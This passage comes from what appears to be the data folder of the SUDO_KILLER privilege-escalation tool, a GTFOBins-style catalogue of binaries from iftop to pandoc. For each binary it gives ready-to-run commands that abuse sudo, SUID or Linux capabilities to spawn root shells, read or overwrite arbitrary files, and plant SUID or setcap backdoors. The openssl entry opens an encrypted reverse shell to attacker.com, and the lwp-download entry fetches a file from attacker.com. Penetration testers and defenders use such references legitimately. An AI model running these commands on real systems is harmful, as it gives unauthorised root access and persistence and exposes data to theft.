elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which iftop) . 17 | 18 | ./iftop 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/install.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_change 6 | TF=$(mktemp) 7 | sudo install -m 6777 $LFILE $TF 8 | -------------------------------------------------------------------------------- /dbins/ionice.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ionice /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/ip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ip -force -batch "$LFILE" 7 | * This only works for Linux with CONFIG_NET_NS=y. 8 | sudo ip netns add foo 9 | sudo ip netns exec foo /bin/sh 10 | sudo ip netns delete foo 11 | * This only works for Linux with CONFIG_NET_NS=y. This version also grants 12 | network access. 13 | sudo ip netns add foo 14 | sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar 15 | sudo ip netns exec bar /bin/sh 16 | sudo ip netns delete foo 17 | sudo ip netns delete bar 18 | -------------------------------------------------------------------------------- /dbins/irb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo irb 6 | exec '/bin/bash' 7 | -------------------------------------------------------------------------------- /dbins/ispell.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ispell /etc/passwd 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/jjs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \$@|sh 6 | _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()" | sudo jjs 7 | -------------------------------------------------------------------------------- /dbins/joe.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo joe 6 | ^K!/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which joe) . 17 | 18 | ./joe 19 | ^K!/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/join.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo join -a 2 /dev/null $LFILE 7 | -------------------------------------------------------------------------------- /dbins/journalctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo journalctl 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/jq.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo jq -Rr . "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/jrunscript.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo jrunscript -e "exec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$ 6 | (tty)')" 7 | -------------------------------------------------------------------------------- /dbins/jtag.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo jtag --interactive 6 | shell /bin/sh 7 | -------------------------------------------------------------------------------- /dbins/julia.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo julia -e 'run(`/bin/sh`)' 6 | -------------------------------------------------------------------------------- /dbins/knife.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo knife exec -E 'exec "/bin/sh"' 6 | -------------------------------------------------------------------------------- /dbins/ksh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ksh 6 | -------------------------------------------------------------------------------- /dbins/ksshell.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ksshell -i $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ksu.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ksu -q -e /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/kubectl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=dir_to_serve 6 | sudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www- 7 | prefix=/x/ 8 | -------------------------------------------------------------------------------- /dbins/latexmk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo latexmk -e 'exec "/bin/sh";' 6 | -------------------------------------------------------------------------------- /dbins/ld.so.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo /lib/ld.so /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/less.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo less /etc/profile 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/lftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo lftp -c '!/bin/sh' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which lftp) . 16 | 17 | ./lftp -c '!/bin/sh' 18 | -------------------------------------------------------------------------------- /dbins/ln.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ln -fs /bin/sh /bin/ln 6 | sudo ln 7 | -------------------------------------------------------------------------------- /dbins/loginctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo loginctl user-status 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/logsave.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo logsave /dev/null /bin/sh -i 6 | -------------------------------------------------------------------------------- /dbins/look.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo look '' "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/lp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/lp.txt -------------------------------------------------------------------------------- /dbins/ltrace.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ltrace -b -L /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/lua.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo lua -e 'os.execute("/bin/sh")' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which lua) . 16 | 17 | ./lua -e 'os.execute("/bin/sh")' 18 | -------------------------------------------------------------------------------- /dbins/luatex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which luatex) . 16 | 17 | ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' 18 | -------------------------------------------------------------------------------- /dbins/lwp-download.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * URL=http://attacker.com/file_to_get 6 | LFILE=file_to_save 7 | sudo lwp-download $URL $LFILE 8 | -------------------------------------------------------------------------------- /dbins/lwp-request.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo lwp-request "file://$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/mail.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * GNU version only. 6 | sudo mail --exec='!/bin/sh' 7 | -------------------------------------------------------------------------------- /dbins/make.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * COMMAND='/bin/sh' 6 | sudo make -s --eval=$'x:\n\t-'"$COMMAND" 7 | -------------------------------------------------------------------------------- /dbins/man.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo man man 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/mawk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo mawk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which mawk) . 16 | 17 | ./mawk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/minicom.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Start the following command to open the TUI interface, then: 6 | 1. press Ctrl-A o and select Filenames and paths; 7 | 2. press e, type /bin/sh, then Enter; 8 | 3. Press Esc twice; 9 | 4. Press Ctrl-A k to drop the shell. After the shell, exit with Ctrl- 10 | A x. 11 | sudo minicom -D /dev/null 12 | -------------------------------------------------------------------------------- /dbins/more.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TERM= sudo more /etc/profile 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/mosquitto.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo mosquitto -c "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/mount.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Exploit the fact that mount can be executed via sudo to replace the mount 6 | binary with a shell. 7 | sudo mount -o bind /bin/sh /bin/mount 8 | sudo mount 9 | -------------------------------------------------------------------------------- /dbins/msfconsole.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo msfconsole 6 | msf6 > irb 7 | >> system("/bin/sh") 8 | -------------------------------------------------------------------------------- /dbins/msgattrib.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgattrib -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/msgcat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgcat -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/msgconv.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgconv -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/msgfilter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Any text file will do as the input (use -i). kill is needed to spawn the 6 | shell only once. 7 | echo x | sudo msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID' 8 | -------------------------------------------------------------------------------- /dbins/msgmerge.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgmerge -P $LFILE /dev/null 7 | -------------------------------------------------------------------------------- /dbins/msguniq.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msguniq -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/mtr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo mtr --raw -F "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/multitime.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo multitime /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/mv.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | TF=$(mktemp) 7 | echo "DATA" > $TF 8 | sudo mv $TF $LFILE 9 | -------------------------------------------------------------------------------- /dbins/mysql.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo mysql -e '\! /bin/sh' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which mysql) . 16 | 17 | ./mysql -e '\! /bin/sh' 18 | -------------------------------------------------------------------------------- /dbins/nasm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nasm -@ $LFILE 7 | -------------------------------------------------------------------------------- /dbins/nawk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo nawk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which nawk) . 16 | 17 | ./nawk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/ncdu.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ncdu 6 | b 7 | -------------------------------------------------------------------------------- /dbins/ncftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ncftp 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/neofetch.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'exec /bin/sh' >$TF 7 | sudo neofetch --config $TF 8 | -------------------------------------------------------------------------------- /dbins/nft.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nft -f "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/nice.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo nice /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/nl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nl -bn -w1 -s '' $LFILE 7 | -------------------------------------------------------------------------------- /dbins/nm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nm @$LFILE 7 | -------------------------------------------------------------------------------- /dbins/node.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 6 | 2]})' 7 | ***** Capabilities ***** 8 | If the binary has the Linux CAP_SETUID capability set or it is executed by 9 | another binary with the capability set, it can be used as a backdoor to 10 | maintain privileged access by manipulating its own process UID. 11 | * cp $(which node) . 12 | sudo setcap cap_setuid+ep node 13 | 14 | ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", 15 | {stdio: [0, 1, 2]})' 16 | -------------------------------------------------------------------------------- /dbins/nohup.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" 6 | -------------------------------------------------------------------------------- /dbins/npm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Additionally, arbitrary script names can be used in place of preinstall 6 | and triggered by name with, e.g., npm -C $TF run preinstall. 7 | TF=$(mktemp -d) 8 | echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json 9 | sudo npm -C $TF --unsafe-perm i 10 | -------------------------------------------------------------------------------- /dbins/nroff.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo '#!/bin/sh' > $TF/groff 7 | echo '/bin/sh' >> $TF/groff 8 | chmod +x $TF/groff 9 | sudo GROFF_BIN_PATH=$TF nroff 10 | -------------------------------------------------------------------------------- /dbins/nsenter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo nsenter /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/octave.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo octave-cli --eval 'system("/bin/sh")' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which octave) . 16 | 17 | ./octave-cli --eval 'system("/bin/sh")' 18 | -------------------------------------------------------------------------------- /dbins/od.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo od -An -c -w9999 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/openssl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * To receive the shell run the following on the attacker box: 6 | openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 7 | 365 -nodes 8 | openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 9 | Communication between attacker and target will be encrypted. 10 | RHOST=attacker.com 11 | RPORT=12345 12 | mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet - 13 | connect $RHOST:$RPORT > /tmp/s; rm /tmp/s 14 | -------------------------------------------------------------------------------- /dbins/openvpn.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh' 6 | * The file is actually parsed and the first partial wrong line is returned 7 | in an error message. 8 | LFILE=file_to_read 9 | sudo openvpn --config "$LFILE" 10 | -------------------------------------------------------------------------------- /dbins/openvt.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The command execution is blind (displayed on the virtual console), but it 6 | is possible to save the output on a temporary file. 7 | COMMAND=id 8 | TF=$(mktemp -u) 9 | sudo openvt -- sh -c "$COMMAND >$TF 2>&1" 10 | cat $TF 11 | -------------------------------------------------------------------------------- /dbins/opkg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * It runs an interactive shell using a specially crafted Debian package. 6 | Generate it with fpm and upload it to the target. 7 | TF=$(mktemp -d) 8 | echo 'exec /bin/sh' > $TF/x.sh 9 | fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF 10 | sudo opkg install x_1.0_all.deb 11 | -------------------------------------------------------------------------------- /dbins/pandoc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | echo DATA | sudo pandoc -t plain -o "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/paste.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 